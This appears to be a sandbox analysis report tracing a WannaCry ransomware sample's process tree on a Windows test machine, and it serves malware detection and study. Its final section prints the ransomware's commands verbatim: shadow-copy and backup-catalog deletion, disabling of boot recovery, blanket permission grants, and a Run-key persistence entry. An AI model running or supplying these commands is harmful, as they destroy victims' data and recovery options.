PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83
PID 2280 wrote to memory of 4540	2280	msedge.exe	83

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1904	attrib.exe
4476	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/LOwIP7
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x80,0x10c,0x7ff801f33cb8,0x7ff801f33cc8,0x7ff801f33cd8
  2⤵
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:2716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2448 /prefetch:8
  2⤵
  PID:4540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4476 /prefetch:1
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:2860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4556 /prefetch:1
  2⤵
  PID:2756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:3172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:3832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:2776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2756 /prefetch:1
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
  2⤵
  PID:736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
  2⤵
  PID:3008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
  2⤵
  PID:840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
  2⤵
  PID:2192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
  2⤵
  PID:3744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
  2⤵
  PID:248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:1
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
  2⤵
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6652 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5444 /prefetch:8
  2⤵
  PID:2988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
  2⤵
  PID:2856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6604 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,1100361678605240058,17550135494561815789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1
  2⤵
  PID:424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2816

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:740

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:896

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:1280
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:4476
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:4976
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 127981730277104.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3456
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1512
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:1904
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2728
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2108
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1684
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      System Location Discovery: System Language Discovery
      PID:4892
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5316
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5336
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:5344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5352
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tgikesyrkli880" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:5412
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5788
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5808
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5820
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6000
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
